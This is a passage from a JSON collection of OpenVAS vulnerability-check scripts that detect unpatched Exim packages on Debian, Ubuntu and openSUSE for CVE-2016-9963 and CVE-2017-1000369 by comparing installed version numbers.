script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:51", "description": "Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.", "cvss3": {}, "published": "2016-12-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703747\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:26", "description": "Exim is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2016-12-23T00:00:00", "type": "openvas", "title": "Exim Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2018-11-13T00:00:00", "id": "OPENVAS:1361412562310106485", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106485", "sourceData": "##############################################################################\n# OpenVAS 
Vulnerability Test\n# $Id: gb_exim_cve_2016_9963.nasl 12338 2018-11-13 14:51:17Z asteins $\n#\n# Exim Information Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106485\");\n script_version(\"$Revision: 12338 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-13 15:51:17 +0100 (Tue, 13 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 10:52:32 +0700 (Fri, 23 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim Information Disclosure Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SMTP problems\");\n script_dependencies(\"gb_exim_detect.nasl\");\n 
script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"If several conditions are met, Exim leaks private information to a remote\nattacker.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may obtain private information.\");\n\n script_tag(name:\"affected\", value:\"Exim 4.69 until 4.87.\");\n\n script_tag(name:\"solution\", value:\"Update to Exim 4.87.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=1996\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.69\", test_version2: \"4.87\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.87.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:18", "description": "The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2017-01-06T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-3164-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843007", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843007", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-3164-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843007\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 05:45:22 +0100 (Fri, 06 Jan 2017)\");\n script_cve_id(\"CVE-2016-9963\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3164-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. 
In certain\nconfigurations, private DKIM signing keys could be leaked to the log files.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3164-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/USN-3164-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.87-3ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.76-3ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-2ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:28:04", "description": "The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2017:1625-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851569", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851569", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851569\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-20 17:22:14 +0200 (Tue, 20 Jun 2017)\");\n script_cve_id(\"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2017:1625-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n - CVE-2017-1000369: Fixed a memory leak in exim commandline handling,\n which could be used to exhaust memory and make 'stack crash' attacks\n likely. 
(boo#1044692)\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1625-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": 
"2017-06-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-3322-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843214", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843214", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for exim4 USN-3322-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843214\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-20 07:00:25 +0200 (Tue, 20 Jun 2017)\");\n script_cve_id(\"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3322-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim did not properly\n deallocate memory when processing certain command line arguments. 
A local\n attacker could use this in conjunction with another vulnerability to possibly\n execute arbitrary code and gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3322-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3322-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.82-3ubuntu2.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.82-3ubuntu2.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.88-5ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.88-5ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.87-3ubuntu1.2\", 
rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.87-3ubuntu1.2\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-2ubuntu2.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-2ubuntu2.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-29T20:07:21", "description": "Exim supports the use of multiple ", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for exim4 (DLA-1001-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891001", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891001", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891001\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-1000369\");\n script_name(\"Debian LTS: Security Advisory for exim4 (DLA-1001-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-29 00:00:00 +0100 (Mon, 29 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00030.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_tag(name:\"summary\", value:\"Exim supports the use of multiple '-p' command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues allows\nattackers to cause arbitrary code execution.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n 
